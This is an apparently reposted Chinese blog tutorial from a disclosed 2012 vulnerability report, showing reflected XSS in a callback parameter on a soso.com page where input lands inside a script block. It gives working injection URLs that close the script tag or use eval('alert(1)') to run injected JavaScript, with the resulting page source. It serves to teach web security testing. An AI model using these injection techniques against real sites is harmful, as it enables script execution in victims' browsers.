最新消息:

[腾讯实例教程] 那些年我们一起学XSS – 2. 输出在<script></script>之间的情况

xss admin 2933浏览 0评论

漏洞作者: 心伤的瘦子

提交时间: 2012-12-13 14:49

公开时间: 2013-01-27 14:50

漏洞类型: xss跨站脚本攻击

危害等级: 低

 

1. 我们找到这么一个点,也是输入和输出都未过滤的一个点。相比教程第一例,其特殊之处在于,是输出在了 <script>[输出]</script>之间。

http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa

如下图:callback参数未做过滤。 在【查看源代码】下,我们可以看到。
83025aafa40f4bfbc6001f63024f78f0f7361830

缺陷网页源代码:

<script type=’text/javascript’>document.domain=’soso.com’;_ret={“_res”:2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}</script>

2. 碰到这种情况,我们一般有以下解法。

2.1 首先判断,是否过滤了 < , > , / 等符号,
2.2 如果都没有过滤,恭喜你,一般可以直接XSS了。代码如下:

http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa</script><script>alert(1)</script>

原理入下图:cdbf6c81800a19d84bce053232fa828ba61e463c

构造callback参数后的源代码

<script type=’text/javascript’>document.domain=’soso.com’;_ret={“_res”:2};try{parent.aaaaaaaaa</script><script>alert(1)</script>(_ret);}catch(err){aaaaaaaaa</script><script>alert(1)</script>(_ret);}</script>

2.3 如果过滤了 <, >,那么就无法使用上面的办法了。我们接着看 3

3. script代码里的构造。

友情提示:这里可能需要一点点 javascript 的知识才行哦~~

我们可以如下构造:

http://activity.soso.com/common/setParentsInfo.php?callback=eval(‘alert(1)’);void

可以看到,源代码是下面的样子。
dc54564e9258d1095cdd2985d058ccbf6c814dcf

也就是说,我们插入的内容,使得这一段javascript依然【语法正确】,能够【正确执行】,并且能够执行【我们所插入的JS代码】,这样我们的目的就达到了。

构造后的源代码如下:

<script type=’text/javascript’>document.domain=’soso.com’;_ret={“_res”:2};try{parent.eval(‘alert(1)’);void(_ret);}catch(err){eval(‘alert(1)’);void(_ret);}</script>

4. 这种输出在JS代码里的情况十分常见,但是呢?不幸的是,像这样没过滤的情况,却不是很常见。例如:

var a=”[输出]”; // 通常程序员会把 ” 过滤掉, 这样的话,一般来说,我们就很难构造。

但是,这并不是说,就一定是不能利用,后面我们会拿腾讯一些【比较有意思】的例子,来进一步说到 这个【输出在js里】的情况的~

转载请注明:jinglingshu的博客 » [腾讯实例教程] 那些年我们一起学XSS – 2. 输出在<script></script>之间的情况

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (2)

  1. javascrit中<script></script>之间的突破方法是想办法将<script>闭合掉后插入自己的代码,如果不能闭合则使用eval等函数来执行javascript代码。
    admin12年前 (2013-06-18)回复
  2. eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。
    admin12年前 (2013-06-18)回复